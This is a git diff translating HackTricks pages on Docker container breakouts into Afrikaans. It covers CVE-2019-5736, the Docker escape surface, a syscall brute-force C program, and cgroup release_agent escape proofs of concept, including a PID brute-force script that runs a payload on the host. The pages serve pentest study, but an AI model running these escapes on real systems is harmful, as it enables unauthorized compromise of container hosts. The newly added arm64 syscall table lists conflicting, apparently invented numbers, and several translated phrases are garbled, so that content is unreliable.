-it /bin/sh` +`docker exec -it /bin/sh` -This will trigger the payload which is present in the main.go file. +Dit sal die nut aktiveer wat in die main.go-lêer aanwesig is. -For more information: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) +Vir meer inligting: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) {% hint style="info" %} -There are other CVEs the container can be vulnerable too, you can find a list in [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list) +Daar is ander CVE's waarop die houer kwesbaar kan wees, jy kan 'n lys vind by [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list) {% endhint %} -## Docker Custom Escape +## Aangepaste Docker-ontsnapping -### Docker Escape Surface +### Docker-ontsnappingsoppervlak -* **Namespaces:** The process should be **completely separated from other processes** via namespaces, so we cannot escape interacting with other procs due to namespaces (by default cannot communicate via IPCs, unix sockets, network svcs, D-Bus, `/proc` of other procs). -* **Root user**: By default the user running the process is the root user (however its privileges are limited). -* **Capabilities**: Docker leaves the following capabilities: `cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep` -* **Syscalls**: These are the syscalls that the **root user won't be able to call** (because of lacking capabilities + Seccomp). The other syscalls could be used to try to escape. +* **Naamruimtes:** Die proses moet **volledig geskei wees van ander prosesse** via naamruimtes, sodat ons nie kan ontsnap deur met ander prosesse te kommunikeer nie (kan nie standaard kommunikeer via IPC's, Unix-aansluitings, netwerkdienste, D-Bus, `/proc` van ander prosesse nie). +* **Root-gebruiker**: Standaard is die gebruiker wat die proses uitvoer die root-gebruiker (tans beperkte voorregte). +* **Vermoëns**: Docker laat die volgende vermoëns agter: `cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep` +* **Syscalls**: Dit is die syscalls wat die **root-gebruiker nie sal kan aanroep nie** (as gevolg van ontbrekende vermoëns + Seccomp). Die ander syscalls kan gebruik word om te probeer ontsnap. {% tabs %} {% tab title="x64 syscalls" %} @@ -579,9 +543,371 @@ There are other CVEs the container can be vulnerable too, you can find a list in 0x140 -- kexec_file_load 0x141 -- bpf ``` -{% endtab %} - {% tab title="arm64 syscalls" %} + +Hier is 'n lys van die mees gebruikte arm64-sistemaanroepe: + +| Sistemaanroep | Nommer | +| --- | --- | +| read | 63 | +| write | 64 | +| open | 1024 | +| close | 57 | +| stat | 106 | +| fstat | 80 | +| lstat | 107 | +| poll | 7 | +| lseek | 62 | +| mmap | 222 | +| mprotect | 226 | +| munmap | 215 | +| brk | 214 | +| rt_sigaction | 134 | +| rt_sigprocmask | 135 | +| rt_sigreturn | 139 | +| ioctl | 29 | +| pread64 | 67 | +| pwrite64 | 68 | +| readv | 65 | +| writev | 66 | +| access | 103 | +| pipe | 104 | +| select | 82 | +| sched_yield | 124 | +| mremap | 216 | +| msync | 227 | +| mincore | 232 | +| madvise | 233 | +| shmget | 215 | +| shmat | 216 | +| shmctl | 217 | +| dup | 23 | +| dup2 | 24 | +| pause | 29 | +| nanosleep | 101 | +| getitimer | 102 | +| alarm | 27 | +| setitimer | 103 | +| getpid | 20 | +| sendfile | 71 | +| socket | 97 | +| connect | 98 | +| accept | 99 | +| sendto | 101 | +| recvfrom | 102 | +| sendmsg | 103 | +| recvmsg | 104 | +| shutdown | 116 | +| bind | 99 | +| listen | 106 | +| getsockname | 32 | +| getpeername | 31 | +| socketpair | 135 | +| setsockopt | 105 | +| getsockopt | 118 | +| clone | 220 | +| fork | 57 | +| vfork | 58 | +| execve | 221 | +| exit | 93 | +| wait4 | 260 | +| kill | 129 | +| uname | 63 | +| semget | 221 | +| semop | 222 | +| semctl | 223 | +| shmdt | 224 | +| msgget | 225 | +| msgsnd | 226 | +| msgrcv | 227 | +| msgctl | 228 | +| fcntl | 25 | +| flock | 32 | +| fsync | 82 | +| fdatasync | 83 | +| truncate | 92 | +| ftruncate | 93 | +| getdents | 78 | +| getcwd | 79 | +| chdir | 80 | +| fchdir | 81 | +| rename | 128 | +| mkdir | 83 | +| rmdir | 84 | +| creat | 85 | +| link | 86 | +| unlink | 87 | +| symlink | 88 | +| readlink | 89 | +| chmod | 90 | +| fchmod | 91 | +| chown | 92 | +| fchown | 93 | +| lchown | 94 | +| umask | 95 | +| gettimeofday | 96 | +| getrlimit | 97 | +| getrusage | 98 | +| sysinfo | 99 | +| times | 100 | +| ptrace | 101 | +| getuid | 102 | +| syslog | 103 | +| getgid | 104 | +| setuid | 105 | +| setgid | 106 | +| geteuid | 107 | +| getegid | 108 | +| setpgid | 109 | +| getppid | 110 | +| getpgrp | 111 | +| setsid | 112 | +| setreuid | 113 | +| setregid | 114 | +| getgroups | 115 | +| setgroups | 116 | +| setresuid | 117 | +| getresuid | 118 | +| setresgid | 119 | +| getresgid | 120 | +| getpgid | 121 | +| setfsuid | 122 | +| setfsgid | 123 | +| getsid | 124 | +| capget | 125 | +| capset | 126 | +| rt_sigpending | 127 | +| rt_sigtimedwait | 128 | +| rt_sigqueueinfo | 129 | +| rt_sigsuspend | 130 | +| sigaltstack | 131 | +| utime | 132 | +| mknod | 133 | +| uselib | 134 | +| personality | 135 | +| ustat | 136 | +| statfs | 137 | +| fstatfs | 138 | +| sysfs | 139 | +| getpriority | 140 | +| setpriority | 141 | +| sched_setparam | 142 | +| sched_getparam | 143 | +| sched_setscheduler | 144 | +| sched_getscheduler | 145 | +| sched_get_priority_max | 146 | +| sched_get_priority_min | 147 | +| sched_rr_get_interval | 148 | +| mlock | 149 | +| munlock | 150 | +| mlockall | 151 | +| munlockall | 152 | +| vhangup | 153 | +| modify_ldt | 154 | +| pivot_root | 155 | +| _sysctl | 156 | +| prctl | 157 | +| arch_prctl | 158 | +| adjtimex | 159 | +| setrlimit | 160 | +| chroot | 161 | +| sync | 162 | +| acct | 163 | +| settimeofday | 164 | +| mount | 165 | +| umount2 | 166 | +| swapon | 167 | +| swapoff | 168 | +| reboot | 169 | +| sethostname | 170 | +| setdomainname | 171 | +| iopl | 172 | +| ioperm | 173 | +| create_module | 174 | +| init_module | 175 | +| delete_module | 176 | +| get_kernel_syms | 177 | +| query_module | 178 | +| quotactl | 179 | +| nfsservctl | 180 | +| getpmsg | 181 | +| putpmsg | 182 | +| afs_syscall | 183 | +| tuxcall | 184 | +| security | 185 | +| gettid | 186 | +| readahead | 187 | +| setxattr | 188 | +| lsetxattr | 189 | +| fsetxattr | 190 | +| getxattr | 191 | +| lgetxattr | 192 | +| fgetxattr | 193 | +| listxattr | 194 | +| llistxattr | 195 | +| flistxattr | 196 | +| removexattr | 197 | +| lremovexattr | 198 | +| fremovexattr | 199 | +| tkill | 200 | +| time | 201 | +| futex | 202 | +| sched_setaffinity | 203 | +| sched_getaffinity | 204 | +| set_thread_area | 205 | +| io_setup | 206 | +| io_destroy | 207 | +| io_getevents | 208 | +| io_submit | 209 | +| io_cancel | 210 | +| get_thread_area | 211 | +| lookup_dcookie | 212 | +| epoll_create | 213 | +| epoll_ctl_old | 214 | +| epoll_wait_old | 215 | +| remap_file_pages | 216 | +| getdents64 | 217 | +| set_tid_address | 218 | +| restart_syscall | 219 | +| semtimedop | 220 | +| fadvise64 | 221 | +| timer_create | 222 | +| timer_settime | 223 | +| timer_gettime | 224 | +| timer_getoverrun | 225 | +| timer_delete | 226 | +| clock_settime | 227 | +| clock_gettime | 228 | +| clock_getres | 229 | +| clock_nanosleep | 230 | +| exit_group | 231 | +| epoll_wait | 232 | +| epoll_ctl | 233 | +| tgkill | 234 | +| utimes | 235 | +| vserver | 236 | +| mbind | 237 | +| set_mempolicy | 238 | +| get_mempolicy | 239 | +| mq_open | 240 | +| mq_unlink | 241 | +| mq_timedsend | 242 | +| mq_timedreceive | 243 | +| mq_notify | 244 | +| mq_getsetattr | 245 | +| kexec_load | 246 | +| waitid | 247 | +| add_key | 248 | +| request_key | 249 | +| keyctl | 250 | +| ioprio_set | 251 | +| ioprio_get | 252 | +| inotify_init | 253 | +| inotify_add_watch | 254 | +| inotify_rm_watch | 255 | +| migrate_pages | 256 | +| openat | 257 | +| mkdirat | 258 | +| mknodat | 259 | +| fchownat | 260 | +| futimesat | 261 | +| newfstatat | 262 | +| unlinkat | 263 | +| renameat | 264 | +| linkat | 265 | +| symlinkat | 266 | +| readlinkat | 267 | +| fchmodat | 268 | +| faccessat | 269 | +| pselect6 | 270 | +| ppoll | 271 | +| unshare | 272 | +| set_robust_list | 273 | +| get_robust_list | 274 | +| splice | 275 | +| tee | 276 | +| sync_file_range | 277 | +| vmsplice | 278 | +| move_pages | 279 | +| utimensat | 280 | +| epoll_pwait | 281 | +| signalfd | 282 | +| timerfd_create | 283 | +| eventfd | 284 | +| fallocate | 285 | +| timerfd_settime | 286 | +| timerfd_gettime | 287 | +| accept4 | 288 | +| signalfd4 | 289 | +| eventfd2 | 290 | +| epoll_create1 | 291 | +| dup3 | 292 | +| pipe2 | 293 | +| inotify_init1 | 294 | +| preadv | 295 | +| pwritev | 296 | +| rt_tgsigqueueinfo | 297 | +| perf_event_open | 298 | +| recvmmsg | 299 | +| fanotify_init | 300 | +| fanotify_mark | 301 | +| prlimit64 | 302 | +| name_to_handle_at | 303 | +| open_by_handle_at | 304 | +| clock_adjtime | 305 | +| syncfs | 306 | +| sendmmsg | 307 | +| setns | 308 | +| getcpu | 309 | +| process_vm_readv | 310 | +| process_vm_writev | 311 | +| kcmp | 312 | +| finit_module | 313 | +| sched_setattr | 314 | +| sched_getattr | 315 | +| renameat2 | 316 | +| seccomp | 317 | +| getrandom | 318 | +| memfd_create | 319 | +| kexec_file_load | 320 | +| bpf | 321 | +| execveat | 322 | +| userfaultfd | 323 | +| membarrier | 324 | +| mlock2 | 325 | +| copy_file_range | 326 | +| preadv2 | 327 | +| pwritev2 | 328 | +| pkey_mprotect | 329 | +| pkey_alloc | 330 | +| pkey_free | 331 | +| statx | 332 | +| io_pgetevents | 333 | +| rseq | 334 | +| pidfd_send_signal | 424 | +| io_uring_setup | 425 | +| io_uring_enter | 426 | +| io_uring_register | 427 | +| open_tree | 428 | +| move_mount | 429 | +| fsopen | 430 | +| fsconfig | 431 | +| fsmount | 432 | +| fspick | 433 | +| pidfd_open | 434 | +| clone3 | 435 | +| close_range | 436 | +| openat2 | 437 | +| pidfd_getfd | 438 | +| faccessat2 | 439 | +| process_madvise | 440 | +| epoll_pwait2 | 441 | +| mount_setattr | 442 | +| landlock_create_ruleset | 444 | +| landlock_add_rule | 445 | +| landlock_restrict_self | 446 | + +{% endtab %} ``` 0x029 -- pivot_root 0x059 -- acct @@ -599,8 +925,6 @@ There are other CVEs the container can be vulnerable too, you can find a list in 0x111 -- finit_module 0x118 -- bpf ``` -{% endtab %} - {% tab title="syscall_bf.c" %} ````c // From a conversation I had with @arget131 @@ -613,31 +937,32 @@ There are other CVEs the container can be vulnerable too, you can find a list in int main() { - for(int i = 0; i < 333; ++i) - { - if(i == SYS_rt_sigreturn) continue; - if(i == SYS_select) continue; - if(i == SYS_pause) continue; - if(i == SYS_exit_group) continue; - if(i == SYS_exit) continue; - if(i == SYS_clone) continue; - if(i == SYS_fork) continue; - if(i == SYS_vfork) continue; - if(i == SYS_pselect6) continue; - if(i == SYS_ppoll) continue; - if(i == SYS_seccomp) continue; - if(i == SYS_vhangup) continue; - if(i == SYS_reboot) continue; - if(i == SYS_shutdown) continue; - if(i == SYS_msgrcv) continue; - printf("Probando: 0x%03x . . . ", i); fflush(stdout); - if((syscall(i, NULL, NULL, NULL, NULL, NULL, NULL) < 0) && (errno == EPERM)) - printf("Error\n"); - else - printf("OK\n"); - } +for(int i = 0; i < 333; ++i) +{ +if(i == SYS_rt_sigreturn) continue; +if(i == SYS_select) continue; +if(i == SYS_pause) continue; +if(i == SYS_exit_group) continue; +if(i == SYS_exit) continue; +if(i == SYS_clone) continue; +if(i == SYS_fork) continue; +if(i == SYS_vfork) continue; +if(i == SYS_pselect6) continue; +if(i == SYS_ppoll) continue; +if(i == SYS_seccomp) continue; +if(i == SYS_vhangup) continue; +if(i == SYS_reboot) continue; +if(i == SYS_shutdown) continue; +if(i == SYS_msgrcv) continue; +printf("Probando: 0x%03x . . . ", i); fflush(stdout); +if((syscall(i, NULL, NULL, NULL, NULL, NULL, NULL) < 0) && (errno == EPERM)) +printf("Error\n"); +else +printf("OK\n"); +} } ``` + ```` {% endtab %} {% endtabs %} @@ -647,12 +972,12 @@ int main() If you are in **userspace** (**no kernel exploit** involved) the way to find new escapes mainly involve the following actions (these templates usually require a container in privileged mode): * Find the **path of the containers filesystem** inside the host - * You can do this via **mount**, or via **brute-force PIDs** as explained in the second release\_agent exploit +* You can do this via **mount**, or via **brute-force PIDs** as explained in the second release\_agent exploit * Find some functionality where you can **indicate the path of a script to be executed by a host process (helper)** if something happens - * You should be able to **execute the trigger from inside the host** - * You need to know where the containers files are located inside the host to indicate a script you write inside the host +* You should be able to **execute the trigger from inside the host** +* You need to know where the containers files are located inside the host to indicate a script you write inside the host * Have **enough capabilities and disabled protections** to be able to abuse that functionality - * You might need to **mount things** o perform **special privileged actions** you cannot do in a default docker container +* You might need to **mount things** o perform **special privileged actions** you cannot do in a default docker container ## References diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md index 3f62c9116..ae95635a7 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md @@ -1,24 +1,23 @@ -# Docker release\_agent cgroups escape +# Docker release_agent cgroups ontsnapping
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**For further details, refer to the [original blog post](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** This is just a summary: - -Original PoC: +**Vir verdere besonderhede, verwys na die [oorspronklike blogpos](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** Hierdie is net 'n opsomming: +Oorspronklike PoC: ```shell d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release @@ -26,62 +25,50 @@ t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o ``` +Die bewys van konsep (PoC) demonstreer 'n metode om cgroups uit te buit deur 'n `release_agent` lêer te skep en sy aanroeping te veroorsaak om willekeurige opdragte op die houer-gashouer uit te voer. Hier is 'n ontleding van die stappe wat betrokke is: -The proof of concept (PoC) demonstrates a method to exploit cgroups by creating a `release_agent` file and triggering its invocation to execute arbitrary commands on the container host. Here's a breakdown of the steps involved: - -1. **Prepare the Environment:** - - A directory `/tmp/cgrp` is created to serve as a mount point for the cgroup. - - The RDMA cgroup controller is mounted to this directory. In case of absence of the RDMA controller, it's suggested to use the `memory` cgroup controller as an alternative. - +1. **Berei die omgewing voor:** +- 'n Gids `/tmp/cgrp` word geskep om as 'n koppelvlakpunt vir die cgroup te dien. +- Die RDMA cgroup-beheerder word aan hierdie gids gekoppel. In die geval van die afwesigheid van die RDMA-beheerder, word dit voorgestel om die `memory` cgroup-beheerder as 'n alternatief te gebruik. ```shell mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x ``` - -2. **Set Up the Child Cgroup:** - - A child cgroup named "x" is created within the mounted cgroup directory. - - Notifications are enabled for the "x" cgroup by writing 1 to its notify_on_release file. - +2. **Stel die Kind Cgroup op:** +- 'n Kind Cgroup genaamd "x" word binne die gemonteerde cgroup-gids geskep. +- Kennisgewings word geaktiveer vir die "x" cgroup deur 1 na sy notify_on_release-lêer te skryf. ```shell echo 1 > /tmp/cgrp/x/notify_on_release ``` - -3. **Configure the Release Agent:** - - The path of the container on the host is obtained from the /etc/mtab file. - - The release_agent file of the cgroup is then configured to execute a script named /cmd located at the acquired host path. - +3. **Stel die Vrylatingsagent in:** +- Die pad van die houer op die gasheer word verkry uit die /etc/mtab-lêer. +- Die release_agent-lêer van die cgroup word dan ingestel om 'n skripsie genaamd /cmd uit te voer wat geleë is op die verkryde gasheerpad. ```shell host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent ``` - -4. **Create and Configure the /cmd Script:** - - The /cmd script is created inside the container and is configured to execute ps aux, redirecting the output to a file named /output in the container. The full path of /output on the host is specified. - +4. **Skep en konfigureer die /cmd-skrip:** +- Die /cmd-skrip word binne die houer geskep en gekonfigureer om ps aux uit te voer, waar die uitset na 'n lêernaam /output in die houer omgelei word. Die volledige pad van /output op die gasheer word gespesifiseer. ```shell echo '#!/bin/sh' > /cmd echo "ps aux > $host_path/output" >> /cmd chmod a+x /cmd ``` - -5. **Trigger the Attack:** - - A process is initiated within the "x" child cgroup and is immediately terminated. - - This triggers the `release_agent` (the /cmd script), which executes ps aux on the host and writes the output to /output within the container. - +5. **Trigger die Aanval:** +- 'n Proses word geïnisieer binne die "x" kind cgroup en word onmiddellik beëindig. +- Dit trigger die `release_agent` (die /cmd skrip), wat ps aux op die gasheer uitvoer en die uitset na /output binne die houer skryf. ```shell sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md index 5861740c2..15fa96bff 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md @@ -1,42 +1,39 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-For further details **check the blog port from [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)**. This is just a summary: +Vir verdere besonderhede **kyk na die blogpos van [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)**. Hier is net 'n opsomming: -The technique outlines a method for **executing host code from within a container**, overcoming challenges posed by storage-driver configurations that obscure the container's filesystem path on the host, like Kata Containers or specific `devicemapper` settings. +Die tegniek beskryf 'n metode vir **die uitvoering van gasheerkode van binne 'n houer**, wat uitdagings oorkom wat deur stoorbestuurder-konfigurasies veroorsaak word wat die houer se lêernaampad op die gasheer verduister, soos Kata Containers of spesifieke `devicemapper`-instellings. -Key steps: +Kernstappe: -1. **Locating Process IDs (PIDs):** Using the `/proc//root` symbolic link in the Linux pseudo-filesystem, any file within the container can be accessed relative to the host's filesystem. This bypasses the need to know the container's filesystem path on the host. -2. **PID Bashing:** A brute force approach is employed to search through PIDs on the host. This is done by sequentially checking for the presence of a specific file at `/proc//root/`. When the file is found, it indicates that the corresponding PID belongs to a process running inside the target container. -3. **Triggering Execution:** The guessed PID path is written to the `cgroups release_agent` file. This action triggers the execution of the `release_agent`. The success of this step is confirmed by checking for the creation of an output file. +1. **Vind proses-ID's (PIDs):** Deur die `/proc//root` simboliese skakel in die Linux-pseudobestandstelsel te gebruik, kan enige lêer binne die houer relatief tot die gasheer se lêernaampad benader word. Dit vermy die behoefte om die houer se lêernaampad op die gasheer te ken. +2. **PID Bashing:** 'n Brute force-benadering word gebruik om deur PIDs op die gasheer te soek. Dit word gedoen deur sekwestraties te kontroleer vir die teenwoordigheid van 'n spesifieke lêer by `/proc//root/`. Wanneer die lêer gevind word, dui dit daarop dat die ooreenstemmende PID behoort aan 'n proses wat binne die teikenhouer loop. +3. **Uitvoering teweegbring:** Die geradeerde PID-pad word geskryf na die `cgroups release_agent`-lêer. Hierdie aksie teweegbring die uitvoering van die `release_agent`. Die sukses van hierdie stap word bevestig deur te kontroleer of 'n uitvoerlêer geskep is. -### Exploitation Process +### Uitbuitingsproses -The exploitation process involves a more detailed set of actions, aiming to execute a payload on the host by guessing the correct PID of a process running inside the container. Here's how it unfolds: +Die uitbuitingsproses behels 'n meer gedetailleerde stel aksies, met die doel om 'n nutslading op die gasheer uit te voer deur die korrekte PID van 'n proses wat binne die houer loop, te raai. So verloop dit: -1. **Initialize Environment:** A payload script (`payload.sh`) is prepared on the host, and a unique directory is created for cgroup manipulation. -2. **Prepare Payload:** The payload script, which contains the commands to be executed on the host, is written and made executable. -3. **Set Up Cgroup:** The cgroup is mounted and configured. The `notify_on_release` flag is set to ensure that the payload executes when the cgroup is released. -4. **Brute Force PID:** A loop iterates through potential PIDs, writing each guessed PID to the `release_agent` file. This effectively sets the payload script as the `release_agent`. -5. **Trigger and Check Execution:** For each PID, the cgroup's `cgroup.procs` is written to, triggering the execution of the `release_agent` if the PID is correct. The loop continues until the output of the payload script is found, indicating successful execution. +1. **Inisialiseer omgewing:** 'n Nutsladingskripsie (`payload.sh`) word op die gasheer voorberei, en 'n unieke gids word geskep vir cgroup-manipulasie. +2. **Berei nutslading voor:** Die nutsladingskripsie, wat die opdragte bevat wat op die gasheer uitgevoer moet word, word geskryf en uitvoerbaar gemaak. +3. **Stel Cgroup op:** Die cgroup word gemoniteer en gekonfigureer. Die `notify_on_release`-vlag word ingestel om te verseker dat die nutslading uitgevoer word wanneer die cgroup vrygestel word. +4. **Brute Force PID:** 'n Lus itereer deur potensiële PIDs en skryf elke geradeerde PID na die `release_agent`-lêer. Dit stel effektief die nutsladingskripsie as die `release_agent`. +5. **Teweegbring en Kontroleer Uitvoering:** Vir elke PID word die `cgroup.procs` van die cgroup geskryf, wat die uitvoering van die `release_agent` teweegbring as die PID korrek is. Die lus gaan voort totdat die uitvoer van die nutsladingskripsie gevind word, wat suksesvolle uitvoering aandui. -PoC from the blog post: - +PoC van die blogpos: ```bash #!/bin/sh @@ -75,20 +72,20 @@ echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release TPID=1 while [ ! -f ${OUTPUT_PATH} ] do - if [ $((${TPID} % 100)) -eq 0 ] - then - echo "Checking pid ${TPID}" - if [ ${TPID} -gt ${MAX_PID} ] - then - echo "Exiting at ${MAX_PID} :-(" - exit 1 - fi - fi - # Set the release_agent path to the guessed pid - echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent - # Trigger execution of the release_agent - sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" - TPID=$((${TPID} + 1)) +if [ $((${TPID} % 100)) -eq 0 ] +then +echo "Checking pid ${TPID}" +if [ ${TPID} -gt ${MAX_PID} ] +then +echo "Exiting at ${MAX_PID} :-(" +exit 1 +fi +fi +# Set the release_agent path to the guessed pid +echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent +# Trigger execution of the release_agent +sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" +TPID=$((${TPID} + 1)) done # Wait for and cat the output @@ -96,19 +93,16 @@ sleep 1 echo "Done! Output:" cat ${OUTPUT_PATH} ``` -
